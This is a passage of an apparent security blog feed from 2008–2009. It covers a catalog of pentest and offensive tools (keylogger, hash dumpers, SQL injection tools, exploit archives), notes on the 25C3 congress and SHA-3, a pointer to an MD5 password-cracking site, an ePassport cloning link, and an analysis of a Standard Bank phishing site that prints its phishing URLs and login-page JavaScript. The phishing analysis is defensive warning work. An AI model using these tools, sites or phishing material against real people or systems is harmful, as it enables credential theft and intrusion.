,similar to ettercap, to capture network traffic in switched environments<br />• cdpsniffer: Cisco discovery protocol (CDP) decoding sniffer<br /><br /><span style="font-weight: bold;">Port Scanner / Information Gathering:</span><br />• nmap: the currently most well-known port scanner. Since version 3.45 it supports version scans. Have a look at PBNJ for diffing different nmap scans.<br />• ISECOM released their nmap wrapper NWRAP, which shows all known protocols for the discovered ports form the Open Protocol Resource Database<br />• Nmap::Scanner: Perl output parser for nmap<br />• Amap by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.<br />• vmap by THC: version mapper to determine the version (sic!) of scanned daemons<br />• Unicornscan: a information gathering and correlation engine<br />• DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems<br />• Athena: a search engine query tool for passive information gathering<br /><br /><span style="font-weight: bold;">Security Scanner:</span><br />• Nessus - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.<br />• OpenVAS: a fork of Nessus 2.2.5 (formerly known as GNessUs)<br />• Nessj: a java based nessus (and compatibles) client (formerly known as Reason)<br />• Paul Clip from @stake released AUSTIN, a security scanner for Palm OS 3.5+.<br /><br /><span style="font-weight: bold;">Webserver:</span><br />• Nikto: a web server scanner with anti IDS features. Based on Rain Forest Puppies libwhisker library.<br />• Wikto: a webserver assessment tool (Windows only; requires .NET framework)<br />• WSDigger: a black box web pen testing tool from Foundstone (Windows based)<br />• Metis: a java based information gathering tool for web sites<br /><br /><span style="font-weight: bold;">Fingerprinting:</span><br />• SinFP: a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets<br />• Winfingerprint: much more than a simple fingerprinting tool.It scans for Windows shares, enumerates usernames, groups, sids and much more.<br />• p0f 2: Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a completely rewrite of the old p0f code.<br />• xprobe2: a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team<br />• Cron-OS: an active OS fingerprinting tool based on TCP timeout behavior. This project was formerly known as "RING" and is now published as a nmap addon.<br />Proxy Server:<br />• Burp proxy: an interactive HTTP/S proxy server for attacking and debugging web-enabled applications<br />• Screen-scraper: a http/https-proxy server with a scripting engine for data manipulation and searching<br />• Paros: a man-in-the-middle proxy and application vulnerability scanner<br />• WebScarab: a framework for analyzing web applications. One of it's basic functionality is the usage as intercepting proxy.<br /><br /><span style="font-weight: bold;">War Dialers:</span><br />• IWar: a classic war dialer, now also with VOIP (IAX2) support. One of a few wardialers for *nix operation systems, and the only with VOIP functionality (to my knowledge)<br />• THC-Scan: a war dialer for DOS, Windows and DOS emulators<br />Malware / Exploit Collections:<br />• packetstormsecurity.org: Huge collections of tools and exploits<br />• ElseNot Project: The project tries to publish an exploit for each MS Security Bulltin. A script kiddie dream come true.<br />• Offensive Computing: Another malware collection site<br />• Securityforest: try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff<br /><br /><span style="font-weight: bold;">Databases / SQL:</span><br />• sqlninja: a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)<br />• CIS Oracle Database Scoring Tool: scans Oracle 8i for compliance with the CIS Oracle Database Benchmark<br />• SQLRecon: an active and passive scanner for MSSQL server. Works on Windows 2000, XP and 2003.<br />• absinthe: a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see here and here).<br />• SQL Power Injector: a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)<br />Voice over IP (VOIP):<br />• vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files<br />• SiVuS: a VOIP vulnerability scanner - SIP protocol (beta, Windows only)<br />• Cain & Abel: mostly a password cracker, can also record VOIP conversations (Windows only)<br />• sipsak (SIP swis army knife): a SIP packet generator<br />• SIPp: a SIP test tool and packet generator<br />• Nastysip: a SIP bogus message generator<br />• voipong: dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP<br />• Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules<br />• rtptools: a toolset for rtp recording and playing<br /><br /><span style="font-weight: bold;">Networkbased Tools:</span><br />• yersinia: a network tool designed to take advantage of some weakeness in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)<br />• Netsed: alters content of network packets while forwarding the packets<br />• ip6sic: a IPv6 stack integrity tester<br /><br /><span style="font-weight: bold;">VPN:</span><br />• ike-scan: an IPSec enumeration and fingerprinting tool<br />• ikeprobe: ike scanning tool<br />• ipsectrace: a tool for profiling ipsec traffic in a dump file. Initial alpha release<br />• VPNMonitor: a Java application to observer network traffic. It graphically represents network connections and highlights all VPN connections. Nice for demonstrations, if somewhat of limited use in a real pen test.<br />• IKECrack:an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])<br />DNSA: DNS Auditing tool by Pierre Betouin<br /><br /><span style="font-weight: bold;">A little more:</span><br />Hunt: a session hijacking tool with curses GUI<br />SMAC: a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.<br />The WebGoat Project: a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.<br />TSCrack: a Windows Terminal Server brute forcer<br />Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning (NetScan, MobilePenTester). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems no longer to support much of their free security tools. So, use instead the alternativ download links above.<br />THC-FuzzyFingerprint: generates fuzzy fingerprints that look almost nearly equal to a given fingerprint/hash-sum. Very useful for MITM attacks.<br />BeatLM, a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM.<br />THC vlogger: a linux kernel based keylogger<br />The Metasploit Framework: an "advanced open-source platform for developing, testing, and using exploit code".<br />ATK (Attack Tool Kit): a comination of security scanner and exploit framework (Windows only)<br />Pirana: an exploitation framework to test the security of email content filters. See also the whitepaper<br />PassLoc: a tool which provides the means to locate keys within a buffer. Based on the article "Playing hide and seek with stored keys" by Adi Shamir.<br />Dl-Hell: identifies an executables dynamic link library (DLL) files<br />DHCPing: a security tool for testing dhcp security<br />ldapenum: a perl script for enumeration against ldap servers.<br />Checkpwd: a dictionary based password checker for oracle databases<br />NirCmd from NirSoft: a windows command line tool to manipulate the registry, initiate a dialup connection and much more<br />Windows Permission Identifier: a tools for auditing user permissions on a windows system<br />MSNPawn: a toolset for footprinting, profiling and assesment via the MSN Search. Windows-only, .NET required<br />snmpcheck:a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.<br />pwdump6: extract NTLM and LanMan hashes from Windows targets<br /><br />Aprovéchenla, en breve un par más ;-)<br /></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com1tag:blogger.com,1999:blog-7490817570652180312.post-36676990589258462182009-01-08T09:31:00.007-02:002009-01-08T09:46:07.376-02:0025th Chaos Communication CongressThe 25th Chaos Communication Congress is over and again has been a great success. About 5.000 people gathered in the Congress Center in the heart of Berlin. As usual, the event was a great mixture of lectures and workshops; serious and funny things around "hacking". <a href="http://events.ccc.de/congress/2008/">[25c3 wiki]<br></a><div style="text-align: justify;"><br>Down near the "Lounge" was the <span style="font-weight: bold;">Hackcenter</span> with its different projects. Here you could build your own quadrocopter <a href="http://www.youtube.com/watch?v=GmTl9CARI7k">[video]</a> <a href="http://events.ccc.de/congress/2008/wiki/Build_a_Quadrocopter">[info]</a> , extend your IXUS camera with additional features like adjustable shutter speed <a href="http://events.ccc.de/congress/2008/wiki/CHDK">[info]</a>, have fun with microcontrollers <a href="http://events.ccc.de/congress/2008/wiki/MicrocontrollerWorkshop">[info]</a> or relax while playing a round of 3d-pong <a href="http://www.youtube.com/watch?v=DX8UY2LNLo0">[video]</a> in the blinkenarea. A complete list of all projects held at the 25c3 can be found <a href="http://events.ccc.de/congress/2008/wiki/Category:Projects">here.</a><br><br><span style="font-weight: bold;">Dan Kaminsky</span>'s talk about DNS was very interesting, although there was nothing really new. Basically it was a summary with the most relevant information around the DNS bug which was published this year. <a href="ftp://ftp.ccc.de/congress/25c3/video_h264_720x576/25c3-2906-en-why_were_we_so_vulnerable_to_the_dns_vulnerability.mp4">[video]</a><br><br><span style="font-weight: bold;">Jacob Appelbaum</span> not only had his lecture about the Cold Boot Attacks <a href="http://events.ccc.de/congress/2008/Fahrplan/events/2922.en.html">[info]</a> , but with <span style="font-weight: bold;">Alexander Sotirov</span> and his crew he also held the famous talk about creating a malicious root CA based on a MD5 collision attack. <a href="http://blog.s21sec.com/2008/12/siguen-sin-ser-preocupantes-las.html">[S21sec blog]</a> <a href="http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt">[slides]</a> <a href="ftp://ftp.ccc.de/congress/25c3/video_h264_720x576/25c3-3023-en-making_the_theoretical_possible.mp4">[video]</a> <a href="http://www.phreedom.org/research/rogue-ca/">[info]</a><br><br><span style="font-weight: bold;">Thorsten Holz</span> spoke about their attempt to analyze banking malware and find the related C&C servers in an automated way. Among other things they improved and extended <a href="http://www.cwsandbox.org/">www.cwsandbox.org</a> - a binary analyzer like <a href="http://www.blogger.com/www.cwsandbox.org">virustotal.com</a> - being able to simulate user interaction in order to behave like a human and e.g. enter credentials into sensitive web sites. They also managed to find and identify lots of "Dropzones" - including full access to some of them. With statistic information about the gathered data of the last seven months he finished this very interesting talk. <a href="http://honeyblog.org/junkyard/presentations/banking-trojans-25C3-web.pdf">[slides]</a> <a href="http://honeyblog.org/junkyard/reports/impersonation-attacks-TR.pdf">[info] </a><br><br><span style="font-weight: bold;">Felix Lindner</span> aka FX had a very interesting speech about a new generation of Cisco exploits. His attempt was to find a generic and version independent way of exploiting Cisco routers. <a href="http://www.phenoelit-us.org/stuff/FX_Phenoelit_25c3_Cisco_IOS.pdf">[slides]</a><br><br>These have only been some of my personal favorites, you can find an overview of all the talks at the following links. Some, but not all the slides and videos are published yet. If audio is enough for you, there you'll find a few more. <a href="http://events.ccc.de/congress/2008/Fahrplan/events.en.html">[talks]</a> <a href="http://events.ccc.de/congress/2008/wiki/Proceedings">[slides]</a> <a href="http://events.ccc.de/congress/2008/wiki/Conference_Recordings">[videos]</a> <a href="ftp://ftp.ccc.de/congress/25c3/audio_only/">[audio]</a><br><br>Lets see if the coming 26c3 congress will again be placed in Berlin's Congress Center since it was quite overcrowded and hard to get into some of the lectures.<br><br>Finally here you have some random and related links: <a href="http://flickr.com/search/?q=25c3&w=all">[flickr]</a> <a href="http://www.youtube.com/results?search_query=25c3&search_type=&aq=f">[youtube]</a> <a href="http://tinyurl.com/8hu44h">[Dan Kaminsky's Pics]</a><br></div><br><span style="font-style: italic;">Clemens Kurtenbach</span><br><span style="font-style: italic;">S21sec e-crime</span><br /><span style="font-style:italic;"><br /><span style="font-weight:bold;">Fuente: <a href="http://blog.s21sec.com/2009/01/chaos-communication-congress-25c3.html">s21sec</a></span></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-22919780060121072552009-01-07T08:44:00.002-02:002009-01-07T08:47:53.314-02:00Seguridad en las sesiones de las aplicaciones Web<a href="http://blog.s21sec.com/">s21sec</a> ha lanzado una serie de notas acerca de la Seguridad en las sesiones de las aplicaciones web. Realmente cuentan con información muy completa, actualmente van por la tercer entrega, y es por ello que se las recomiendo! No se lo pierdan!<br /><br /><a href="http://blog.s21sec.com/2008/12/seguridad-en-las-sesiones-de-las.html">Seguridad en las sesiones de las aplicaciones Web I</a><br /><a href="http://blog.s21sec.com/2008/12/seguridad-en-las-sesiones-de-las_31.html">Seguridad en las sesiones de las aplicaciones Web II</a><br /><a href="http://blog.s21sec.com/2009/01/seguridad-en-las-sesiones-de-las.html">Seguridad en las sesiones de las aplicaciones Web III</a><br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com1tag:blogger.com,1999:blog-7490817570652180312.post-15603837587157620172009-01-07T08:31:00.002-02:002009-01-07T08:39:37.406-02:00Cryptographic hash Algorithm CompetitionPor si muchos no lo sabían les cuento que se esta realizando una competencia para determinar el nuevo algoritmo de cifrado, que se llamará SHA-3. En la primer ronda ya quedan 51 de los 64 participantes iniciales y aún se continúa realizando el análisis sobre los algoritmos restantes.<br />En <a href="http://ehash.iaik.tugraz.at/wiki/The_SHA-3_Zoo">ésta página</a> pueden ver cuales de los algoritmos ya han sido quebrados y la técnica que se utilizo para lograrlo (en otro post detallaremos qué significa cada método).<br />Veremos quién resulta victorioso!<br /><br />Más información en:<br /><ul><li><a href="http://en.wikipedia.org/wiki/SHA-3">Wikipedia</a></li><li><a href="http://csrc.nist.gov/groups/ST/hash/sha-3/Round1/index.html">NIST (<span style="font-style: italic;">National Institute of Satndards and Technology</span>)</a></li><li><a href="http://blog.s21sec.com/2009/01/sha-3-y-algunos-conceptos.html">s21sec</a><br /></li></ul>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-67663163503373112092009-01-07T08:26:00.002-02:002009-01-07T08:31:11.655-02:00Obtener pass con hash MD5Seguramente todos han oido hablar del algoritmo de encripcion MD5 ya que su uso es muy extenso cotidianamente. Es por ello que será de interes saber la clave un password cifrado con este algoritmo, es por ello que aquí les recomiendo una página en donde ya estan alojadas muchísimas claves ya calculadas: <a href="http://www.passcracking.com./index.php">PassCracking.ru</a>, espero que les sea de ayuda ;)<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-31644009685884799372009-01-05T09:19:00.002-02:002009-01-05T09:25:53.673-02:00The Official Nmap Project Guide to Network Discovery and Security ScanningComo sabrán (aunque puede que algunos nos e hayan enterado) de mano de Fyodor se viene este práctico libro que tendrá como finalidad introducirnos en el magnífico mundo del Nmap, el cual es para mi gusto, una de las mejores herramientas que se han diseñado. Muchos deben conocerlo ya, y si no es así no se que esperan para entrar a la <a href="http://nmap.org/download.html">sección de descargas</a>.<br />Pueden ver la primer mitad del libro en la página de Nmap, <a href="http://nmap.org/book/toc.html">sección book</a> ;).<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-92073008661359470902009-01-02T08:51:00.002-02:002009-01-02T08:59:56.937-02:00Predicciones para el 2009<span style="font-size:100%;"><span style="font-family: verdana;">Nuestros amigos de <a href="http://taosecurity.blogspot.com">TaoSecurity</a> han elaborado sus propias "predicciones" para este 2009 que arranca con todo.</span><br /></span><ol style="font-style: italic; font-family: verdana;"><li><span style="font-size:100%;"><b>Expect greater government involvement in assessing the security of private sector networks.</b> I wasn't inventing this a year ago, and I'm not inventing it now. I'm extrapolating from a trend line. My post <a href="http://taosecurity.blogspot.com/2008/12/letters-you-will-need-to-know-201-cmr.html">Letters You Will Need to Know: 201 CMR 17.00</a> is just the latest example of increasingly aggressive government involvement in private sector security matters.</span></li><span style="font-size:100%;"><br /></span><li><span style="font-size:100%;"><b>Expect to start learning about IPv6, or be confused quickly.</b> 2009 is not the year of IPv6, but we're getting there. The US Department of Defense is already grappling with IPv6, despite the compliance charade of mid-2008. Wider adoption of Microsoft Vista and its tunnel mechanisms, along with IPv6-active consumer devices, are driving IPv6 in one form or the other into our lives.</span></li><span style="font-size:100%;"><br /></span><li><span style="font-size:100%;"><b>Expect at least one cloud security incident to affect something you value.</b><a href="http://www.cloudsecurity.org/">Cloud Security</a> blog, but I know many of us are already depending on cloud services. In 2007 and 2008 we started suffering denial when services suffered problems of availability. Next will be disclosure and then degradation. For more on these terms read <a href="http://taosecurity.blogspot.com/2008/02/first-they-came-for-bandwidth.html">First They Came for Bandwidth...</a></span> This is not the great </li><span style="font-size:100%;"><br /></span><li><span style="font-size:100%;"><b>Expect network security to matter again.</b> I may be a little late on this one, given problems we had with DNS, BGP, and even SSL in 2008. I think these sorts of problems demonstrate that there's lots of vulnerability left outside the platform, operating system, and applications. As IPv6 becomes more important this one is going to the top of the list, probably in 2010.</span></li><span style="font-size:100%;"><br /></span><li><span style="font-size:100%;"><b>Expect to buy fewer "new" security products.</b> We need to get back to basics by answering the sorts of questions that appeared in my post <a href="http://taosecurity.blogspot.com/2008/11/marcus-ranum-on-network-security.html">Marcus Ranum on Network Security</a>. In tough economic times, managers are not going to spend on new equipment if they still don't know what the stuff you just bought does. Spend more time on consolidation and specialization and less time on looking for the next <a href="http://taosecurity.blogspot.com/2007/11/deflect-silver-bullets.html">security silver bullet</a>.</span></li></ol>Hagamos caso a lo que nos dice Bejtlich ;)<br /><br />Fuente: <a href="http://taosecurity.blogspot.com/2009/01/predictions-for-2009.html">TaoSecurity</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-40249995663360586112008-12-30T08:21:00.010-02:002008-12-30T10:36:49.495-02:00Análisis de Phishing en Standard Bank (30/12/2008).-Hoy por la mañana he recibido un curioso correo de Standard Bank SA:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHuwuGEOUCyDak2ejOpWkDpmor0HWEyhj5HV4Gq6BRZnhvLm-XI_zHvr9GBKJ-9A1haeyJk9iTb2YytPtfs3PhkepK5TkoCCwQjNAeRqHuCRozNnf3oh-63U9NuqBpi25SRQhfkktGiqg/s1600-h/ej_pishing01.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHuwuGEOUCyDak2ejOpWkDpmor0HWEyhj5HV4Gq6BRZnhvLm-XI_zHvr9GBKJ-9A1haeyJk9iTb2YytPtfs3PhkepK5TkoCCwQjNAeRqHuCRozNnf3oh-63U9NuqBpi25SRQhfkktGiqg/s320/ej_pishing01.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5285526660184946994" /></a><br /><br />Todo parece muy correcto, sin embargo, nadie se cree que Standard Bank necesite verificar nuestros datos. Al margen de eso, el link que aparece en el email es el correcto de Standard Bank aunque si se fijan en detalle esos links nos llevaran a otras URL's, no a las que tienen configuradas, dichas páginas son:<br /><br />http://standardbank.com.ar.webempresas.idkey26914511442100136208.secupends8.cn/ar_pers/ (para personas)<br /><br />http://standardbank.com.ar.webempresas.idkey2323415925205188159167.secupends8.cn/ar_corp/ (para empresas)<br /><br />Hemos encontrado algo interesante, estos no parecen los sitios de Standard Bank, veamos si encontramos en ellos algo interesante (explorando un poquito el código fuente):<br /><pre><code>var dummy = false;<br />var procesando = false;<br /><br /> function SetCookie (name, value) {<br /> expireDate = new Date;<br /> expireDate.setDate(expireDate.getDate()+10);<br /> document.cookie = name + '=' + value + ';expires=' + expireDate.toGMTString();<br /> }<br /><br /> function GetCookie (name) {<br /> var arg = name + "=";<br /> var alen = arg.length;<br /> var clen = document.cookie.length;<br /> var i = 0;<br /> while (i < clen) {<br /> var j = i + alen;<br /> if (document.cookie.substring(i, j) == arg)<br /> return getCookieVal (j);<br /> i = document.cookie.indexOf(" ", i) + 1;<br /> if (i == 0) break;<br /> }<br /> return null;<br /> }<br /><br /> function getCookieVal(offset) {<br /> var endstr = document.cookie.indexOf (";", offset);<br /> if (endstr == -1)<br /> endstr = document.cookie.length;<br /> return unescape(document.cookie.substring(offset, endstr));<br /> }<br /><br /><br /> function validateLogin (frmForm) {<br /> var strInput;<br /> var strError = '';<br /> var blnSucess = false;<br /> var strValidos = '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';<br /><br /> with (frmForm) {<br /> //Valido nombre de usuario<br /> strInput = usuario.value;<br /> if (strInput.length < 1) {<br /> strError += 'Debe ingresar el nombre de usuario.\n';<br /> } else if (strInput.length < 8 || strInput.length > 12) {<br /> strError += 'El nombre de usuario debe tener ente 8 y 12 caracteres.\n';<br /> }<br /> else<br /> {<br /> strIngr = strInput.split("");<br /> for(j=0; (j<strIngr.length); j++)<br /> {<br /> if (strValidos.indexOf(strIngr[j])==-1)<br /> {<br /> strError += 'Debe ingresar sólo números o letras';<br /> break;<br /> }<br /> }<br /> }<br /> //Valido clave<br /> strInput = password.value;<br /> if (strInput.length < 1)<br /> {<br /> strError += 'Debe ingresar una clave de acceso.\n';<br /> }<br /> else if (strInput.length < 8 || strInput.length > 8)<br /> {<br /> strError += 'La clave de acceso debe tener 8 caracteres.\n';<br /> }<br /> else<br /> {<br /> strIngr = strInput.split("");<br /> for(j=0; (j<strIngr.length); j++)<br /> {<br /> if (strValidos.indexOf(strIngr[j])==-1)<br /> {<br /> strError += 'Debe ingresar sólo números o letras';<br /> break;<br /> }<br /> }<br /> }<br /> }<br /><br /> if (strError) {<br /> alert (strError);<br /> blnSucess = false;<br /> } else {<br /><br /> blnSucess = true;<br /><br /> if ( dummy == false )<br /> {<br /> dummy = true;<br /> }<br /> else<br /> {<br /> alert ('Aguarde, su transaccion esta siendo procesada . . .');<br /> blnSucess = false;<br /> }<br /> }<br /> return blnSucess;<br /> }<br /><br />function validaNavegador()<br />{<br /> var valida = false;<br /> if(navigator.appName=="Netscape")<br /> {<br /> if(parseFloat(navigator.appVersion) >= 4.75)<br /> {<br /> // version correcta 4.75<br /> valida = true;<br /> }<br /> //return;<br /> }<br /> else<br /> {<br /> var version = new String(navigator.appVersion);<br /> var i = version.indexOf("MSIE ");<br /> if(i >= 0)<br /> {<br /> var fVersion = parseFloat(version.substring(i + 5))<br /> if(fVersion >= 5.5) // version correcta 5.5<br /> valida = true;<br /> //return;<br /> }<br /> }<br /> if(!valida)<br /> {<br /><br /> }<br /> else<br /> {<br /> document.frmLogin.usuario.focus();<br /> }<br />}<br /><br />function load()<br />{<br /> // document.frmLogin.usuario.focus();<br /> validaNavegador();<br />}<br /><br />function KBgo(check, link)<br />{<br /> if (check.checked == true)<br /> {<br /> this.location.href="https://www.standardbank.com.ar:443/cgi-bin/preprd.dll/bkb/access.do?" + link + "&kb=s";<br /> }<br />}<br /></code></pre>Bueno, esto habla por si solo, espera a que ingresemos nuestro user y pass, los obtiene y luego nos redirecciona a la pagina real de Standard Bank, todo típico en un ataque de Phishing, es el modus operandi que se encuentra en cualquier libro. Tengan cuidado y fijense bien adonde entran, las diferencias entre las páginas es nula.<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-19526737742727388872008-12-30T01:00:00.000-02:002008-12-30T01:00:00.373-02:00Clonar ePassport.-Hoy he leído en la fabulosa <a href="http://freeworld.thc.org/">web de THC</a> una noticia publicada por vonJeek en la cual nos brinda toda la información necesaria para poder clonar <span style="font-style:italic;"><span style="font-weight:bold;">"nuestro"</span> </span>propio ePassport. Véanlo aquí:<br /><br />http://freeworld.thc.org/thc-epassport/<br /><br />Que no caiga en malas manos! ;)<br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0